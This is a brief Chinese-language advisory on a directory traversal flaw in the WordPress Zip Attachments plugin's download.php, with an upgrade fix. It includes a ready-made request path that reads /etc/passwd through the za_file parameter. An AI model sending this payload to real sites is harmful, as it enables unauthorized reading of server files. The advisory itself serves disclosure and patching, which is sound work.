wordpress 任意文件下载 漏洞

WordPress 1.5.1 之前的 Zip 附件插件中的 download.php 中的目录遍历漏洞允许远程攻击者通过 za_file 参数中的 ..（点点）读取任意文件。

Zip 附件 <= 1.1.4 - 任意文件下载

/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd

修复方案：

升级：Zip 附件插件 1.5.1